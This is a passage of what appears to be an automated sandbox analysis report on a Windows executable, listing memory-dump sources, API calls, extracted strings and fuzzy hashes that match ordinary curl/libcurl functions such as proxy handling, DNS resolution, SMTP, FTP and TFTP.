                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
                            • API String ID: 0-874090715
                            • Opcode ID: 617a550ccc24c83cccd6beebe1380ce5a86227a52f31699d76c235931b232c34
                            • Instruction ID: 88d50a84f3821fe6208253633ff8ba31fa51d138400d28e5c3f86bc855c7b700
                            • Opcode Fuzzy Hash: 617a550ccc24c83cccd6beebe1380ce5a86227a52f31699d76c235931b232c34
                            • Instruction Fuzzy Hash: F4D17D61E08B8695FB18EB26D4902B9A7B0BB48799F800531CE3E573D5DFBCE545C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: inet_pton$strtoultolower
                            • String ID: (non-permanent)$%255[^:]:%d$Added %s:%d:%s to DNS cache%s$Couldn't parse CURLOPT_RESOLVE entry '%s'$Couldn't parse CURLOPT_RESOLVE removal entry '%s'$RESOLVE %s:%d is - old addresses discarded$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal
                            • API String ID: 302596564-3811207075
                            • Opcode ID: 6254b0986a885a797b90499b5a55a3b5628591d9766981833ccc0e9d5289b4ee
                            • Instruction ID: c78f081ed5869af59d3139d5f93441538786ee101712e9e196d9c3d05f351218
                            • Opcode Fuzzy Hash: 6254b0986a885a797b90499b5a55a3b5628591d9766981833ccc0e9d5289b4ee
                            • Instruction Fuzzy Hash: D5C1F022B09A8694EB21AB21E5403F9A771EB45798FC40532DA2E177C9DFBCE941C7D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: sendto$ErrorLast_time64
                            • String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                            • API String ID: 3931062552-2715966420
                            • Opcode ID: 3ffd24e78324eb47ad2a384c2a7b43ae78404e309768b84b9b838f2f4ed7a7bc
                            • Instruction ID: 8aad4a45c97edaf4579c5cd08aa07018ede6dd33b0ef97bccb1749b53787dca1
                            • Opcode Fuzzy Hash: 3ffd24e78324eb47ad2a384c2a7b43ae78404e309768b84b9b838f2f4ed7a7bc
                            • Instruction Fuzzy Hash: E4A1AD3260868282E764EF29D4407E8B7B0FB49F89F848535DE5D4B798DF78E544CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$_strdup
                            • String ID: out of memory
                            • API String ID: 2653869212-49810860
                            • Opcode ID: cebc5a68e8c6c65b57a25f94a9e4135490d1ca1d4d8d76297b4b87e76a2f4a20
                            • Instruction ID: 7981bf1372fa42541ced77e322805e6b7abd113b2b7d0fdb6f8fd45763375e80
                            • Opcode Fuzzy Hash: cebc5a68e8c6c65b57a25f94a9e4135490d1ca1d4d8d76297b4b87e76a2f4a20
                            • Instruction Fuzzy Hash: E6818B6270AB8682EB58EF21904467AB7B4FF44748FC24435CB6D47391EFB8E460D3A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l$free
                            • String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$blobpointer$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
                            • API String ID: 1144208884-2831394677
                            • Opcode ID: 0df8022c24536910f2c23727c5bca70af129cce54a723775b81e263de2d2913a
                            • Instruction ID: 0cee77d1627ceeeec7b7a6c82c6fa2e45b7ddfbae7546949d45539ac683b5582
                            • Opcode Fuzzy Hash: 0df8022c24536910f2c23727c5bca70af129cce54a723775b81e263de2d2913a
                            • Instruction Fuzzy Hash: CE61D123A0C69245EB20EB11E4406F9A37AAF94B94FD44131DE2D077D6DFBCE546D3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __acrt_iob_func__swprintf_lfputs$_getchfree
                            • String ID: %s:%s$Enter %s password for user '%s' on URL #%zu:$Enter %s password for user '%s':
                            • API String ID: 768465752-2337704101
                            • Opcode ID: ee29db12ca0665365c94177c0bcdd086137660af24da16c43ee963f43f3fef36
                            • Instruction ID: d2151edad03fc004bfbf4cef35477925269f4d6e2381a722c4eafe1b56282561
                            • Opcode Fuzzy Hash: ee29db12ca0665365c94177c0bcdd086137660af24da16c43ee963f43f3fef36
                            • Instruction Fuzzy Hash: 5151F622A09A8282EB51EB11E8402FAB3B4BF84784F844435DEAD077DADFBDD105C390
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast_errno$__swprintf_l__sys_errlist__sys_nerrstrncpy
                            • String ID: Unknown error %d (%#x)
                            • API String ID: 1793456055-2414550090
                            • Opcode ID: 722845d8a610ba7c2703c60a57ff632a872729768dbbd030aded981cdb362460
                            • Instruction ID: 388e5d8f4143cc656496c8eed3bf1a2a754839e28a182a4111d4f571951b50b2
                            • Opcode Fuzzy Hash: 722845d8a610ba7c2703c60a57ff632a872729768dbbd030aded981cdb362460
                            • Instruction Fuzzy Hash: 7F318125A0874385FB18BF21A424239A772BF85B81FC84434C92E077D6DFFDA440E7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorFileLast$CloseCreateHandleTime_strdupfree
                            • String ID: Failed to get filetime: CreateFile failed: GetLastError %u$Failed to get filetime: GetFileTime failed: GetLastError %u$Failed to get filetime: underflow
                            • API String ID: 1016757606-2112902429
                            • Opcode ID: 262024fe6c3cde13a0cb35c274e0595f52d58bce0af3a7a284f9fbce9e73a93d
                            • Instruction ID: f55c61533b23fd016a1350cbf143effa8f91e553a93cb56c527d511858ba01e0
                            • Opcode Fuzzy Hash: 262024fe6c3cde13a0cb35c274e0595f52d58bce0af3a7a284f9fbce9e73a93d
                            • Instruction Fuzzy Hash: EF31B022B0864286EB18AB26E444279E3B1AF44B95FC84531D97E07BD8DFACE50587A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$_strdup$malloc
                            • String ID: %s$--url$2$option %s: %s
                            • API String ID: 854390910-1570926479
                            • Opcode ID: 1de127588c734ebbed0c8444cb0a0d952fa855a3f5e616187e5108e14bc2b059
                            • Instruction ID: 3bcda14d3d56f6c11957a556f252277e68c023bb302be9da6304291a62cc514c
                            • Opcode Fuzzy Hash: 1de127588c734ebbed0c8444cb0a0d952fa855a3f5e616187e5108e14bc2b059
                            • Instruction Fuzzy Hash: 94813B62A0D7C285EB69EB1594502B9B7B1EB8578CFC84135DAAD073C5EFBCE441C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: AUTH$HELO %s$Remote access denied: %d$SMTPUTF8$STARTTLS$STARTTLS$STARTTLS not supported.$Unexpectedly short EHLO response
                            • API String ID: 1488884202-3893574230
                            • Opcode ID: e9bbbf5d71e5a3d55eadb2fd136bb7f305fa2d28e2ba61e783d744d8b10c1a51
                            • Instruction ID: 25268c46361c134d56a2256e3ba440e9c96c956e580bffa9e69b035913970ac6
                            • Opcode Fuzzy Hash: e9bbbf5d71e5a3d55eadb2fd136bb7f305fa2d28e2ba61e783d744d8b10c1a51
                            • Instruction Fuzzy Hash: 4851CF62F0CAC344EB21AA1598042B9E6B4BB11B94FD40932DA7D076C5DFECE485DBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersion
                            • String ID: RtlVerifyVersionInfo$ntdll
                            • API String ID: 60985879-1699696460
                            • Opcode ID: a2b51daf946700963a2e2554f2a48f04fa606162fb9106bcf4c5e23bc4cf3138
                            • Instruction ID: ef4a455282be6d83339d36ad814a6ee6571415275502718bb381079833053b40
                            • Opcode Fuzzy Hash: a2b51daf946700963a2e2554f2a48f04fa606162fb9106bcf4c5e23bc4cf3138
                            • Instruction Fuzzy Hash: 2A410531A0D24286F728EB25E4243BAA7B1AF89745F844039D96E077D5CFFEE50497E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __acrt_iob_func$_fileno_strdup$_fstat64freeftell
                            • String ID:
                            • API String ID: 1299477587-0
                            • Opcode ID: 79eaa1cf3bedb6ec6923da53c50699186514a1163730ca21cbdf86dcc8735609
                            • Instruction ID: b189a8603a9cb4bb31775584b15af182e567a3b7c9021faed50fe07d35d4d13e
                            • Opcode Fuzzy Hash: 79eaa1cf3bedb6ec6923da53c50699186514a1163730ca21cbdf86dcc8735609
                            • Instruction Fuzzy Hash: AE51F422B0974281FB29BB21A51023AA7B0AF94B91FD14434DE6D477D6EFBCE441C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA3E9F
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA3EBD
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA4018
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA4038
                            • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA4135
                            • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA4179
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: strncmp$strtol
                            • String ID: %s== Info: %.*s$I32$I64
                            • API String ID: 1111410017-699021961
                            • Opcode ID: 1267a26aac4a315d804af1774754580a0ae1bca02bf288fcad5f4b6862db9ef4
                            • Instruction ID: cd9bb3d227cf07d8ddbeca0afa13b61029c1606fbc8eac41c93e4860384d2fd6
                            • Opcode Fuzzy Hash: 1267a26aac4a315d804af1774754580a0ae1bca02bf288fcad5f4b6862db9ef4
                            • Instruction Fuzzy Hash: 74020732E0850285F768FB28849823CA6B5BF65744FD90639CA6E437D6CFFDA50183E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _strdupmallocrealloc
                            • String ID: empty string within braces$nested brace$out of memory$range overflow$unexpected close bracket$unmatched brace
                            • API String ID: 178021264-3046722810
                            • Opcode ID: 974c668c299ee9774a45e061ea81ad6e394b7ccd718daec43709466e76dff075
                            • Instruction ID: 38d766550b23e8b6c5e51b47a84d929ea0e84b41f6b2c4c28cb1fa1c5d7c4a89
                            • Opcode Fuzzy Hash: 974c668c299ee9774a45e061ea81ad6e394b7ccd718daec43709466e76dff075
                            • Instruction Fuzzy Hash: E951DD32A09B5189E754DF16D488738B3B5FB08B40F868139CE6D03795DFB8E541D3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf$strcmp
                            • String ID: Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s
                            • API String ID: 4079719990-2673429991
                            • Opcode ID: d6afcecbec7d592414ebcba26159cc0638714725e72083c6de9465a5a5341e19
                            • Instruction ID: 5ad6b748525cd7bb2c7a040dfd1b6a3a85c752a556cf33a13620ff7a8cc30202
                            • Opcode Fuzzy Hash: d6afcecbec7d592414ebcba26159cc0638714725e72083c6de9465a5a5341e19
                            • Instruction Fuzzy Hash: 2D519D21A08A8682EB18EB11D5603F8A3B1BF45B85FC44532DA6E4B3D5DFBCE515C3E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l$strcmp
                            • String ID: SMTPUTF8$%s %s%s$EXPN$HELP$VRFY %s%s%s%s
                            • API String ID: 4230950830-2300960079
                            • Opcode ID: 2b968608df519ad54de98174ae744b379c4e95fd54fe13beebec36cd46ce6c6c
                            • Instruction ID: 45148e9dfe41e2d05b2d098826443d08f9f9a1b6855848df20667317e3f74403
                            • Opcode Fuzzy Hash: 2b968608df519ad54de98174ae744b379c4e95fd54fe13beebec36cd46ce6c6c
                            • Instruction Fuzzy Hash: 46518162B0CB8281EB15EB15D8403B9A7B0EF54B84F944532DAAE036D4DFBDE544C7D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: File already completely downloaded$Instructs server to resume from offset %I64d$Maximum file size exceeded$Offset (%I64d) was beyond file size (%I64d)$REST %I64d$RETR %s$ftp server doesn't support SIZE
                            • API String ID: 1488884202-1529409809
                            • Opcode ID: bee56b47ca032b2390ad3398ec537f7012b15cfead827331f4db812a89521367
                            • Instruction ID: 4aecc1d965d6c14657cafa141a3747c29a455db3afc87477cee11aeda8fb1c6d
                            • Opcode Fuzzy Hash: bee56b47ca032b2390ad3398ec537f7012b15cfead827331f4db812a89521367
                            • Instruction Fuzzy Hash: 8B41A262A0974281EB04EB19E4442B9B3B0EB147A8FD84231DA3D477D5DFBCE191C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F1D9F917), ref: 00007FF7F1DA0546
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _strdup
                            • String ID: Accept$Accept: application/json$Content-Type$Content-Type: application/json$curl/7.83.1$host$out of memory$proxy
                            • API String ID: 1169197092-2108368468
                            • Opcode ID: 009e05c5cfe81489adb0076801135eebd16bfa9b97869c28fe556ae7a8bd23ca
                            • Instruction ID: 7b64ba4b36298e275ad6e5a0c2fb8365df625d5c91dcd1e7702fe664a32b8924
                            • Opcode Fuzzy Hash: 009e05c5cfe81489adb0076801135eebd16bfa9b97869c28fe556ae7a8bd23ca
                            • Instruction Fuzzy Hash: 55311E21A09A4392EB55EB1699503B9A7B0FF44780FC80035DA6C473D6DFBDF56583A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: puts$__acrt_iob_func
                            • String ID: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".$%s: %s$Invalid category provided, here is a list of all categories:$Usage: curl [options...] <url>$all$category
                            • API String ID: 1292152210-1419887204
                            • Opcode ID: f7184cb644edf7fad2517d2ada4b8365c6cc52b94971f4c97aa5ef37d305f758
                            • Instruction ID: ba4a10c20a7435605ea033d234594afde9387e62223914759f0e7cd089a25df2
                            • Opcode Fuzzy Hash: f7184cb644edf7fad2517d2ada4b8365c6cc52b94971f4c97aa5ef37d305f758
                            • Instruction Fuzzy Hash: 1F316B21A1DA0681EB18BB15D8941B8A371EF44BD4FD04035D93E477E9DFACE50687E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
